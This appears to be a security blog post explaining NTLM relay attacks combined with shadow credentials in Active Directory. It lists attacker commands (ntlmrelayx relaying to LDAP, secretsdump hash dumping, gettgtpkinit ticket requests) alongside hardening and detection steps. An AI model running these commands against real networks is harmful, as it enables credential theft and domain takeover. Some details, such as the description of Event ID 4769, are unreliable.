Listen to this Post
NTLM relay attacks combined with shadow credentials pose a significant threat to enterprise networks. Attackers exploit weak NTLM authentication to relay credentials and gain unauthorized access. This technique allows them to impersonate users, escalate privileges, and move laterally across systems.
You Should Know:
1. Understanding NTLM Relay Attacks
NTLM relay attacks occur when an attacker intercepts NTLM authentication requests and forwards them to another system to gain access. Tools like Responder and Impacket’s ntlmrelayx automate this process.
Example Command (Attacker Side):
python3 ntlmrelayx.py -t ldap://dc.example.com -smb2support --shadow-credentials --add-computer
### **2. Exploiting Shadow Credentials**
Shadow credentials involve modifying a user or computer object’s `msDS-KeyCredentialLink` attribute to allow certificate-based authentication.
**Step-by-Step Exploitation:**
1. **Dump NTLM Hashes** (If already compromised):
secretsdump.py DOMAIN/user:[email protected]
2. Relay NTLM to LDAP & Add Shadow Credentials:
python3 ntlmrelayx.py -t ldaps://dc.example.com --shadow-credentials --add-computer
3. Request a Kerberos Ticket Using the New Certificate:
gettgtpkinit.py -cert-pem cert.pem -key-pem key.pem domain/user user.ccache
### **3. Defensive Measures**
- Disable NTLM where possible (Use Kerberos).
- Enable SMB Signing to prevent relay attacks:
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
- Monitor LDAP Changes for unexpected `msDS-KeyCredentialLink` modifications.
### **4. Detection Techniques**
- SIEM Rules: Look for Event ID 4769 (Kerberos TGT requests with certificate authentication).
- AD Monitoring: Track changes to `msDS-KeyCredentialLink` via PowerShell:
Get-ADObject -Filter * -Properties msDS-KeyCredentialLink | Where-Object { $_.'msDS-KeyCredentialLink' }
### **5. Mitigation via GPO**
- Restrict NTLM Relay Attack Paths:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" -Name "LdapServerIntegrity" -Value 2
**What Undercode Say:**
NTLM relay attacks remain a critical threat due to legacy authentication dependencies. Organizations must enforce SMB signing, disable NTLM, and monitor certificate-based authentication anomalies. Attackers leverage shadow credentials for persistence, making LDAP hardening essential.
**Expected Output:**
[+] Successfully relayed NTLM to LDAP [+] Shadow credential added to: CN=Victim,DC=example,DC=com [+] Certificate saved to: cert.pem
Reference: dsinternals.com
References:
Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
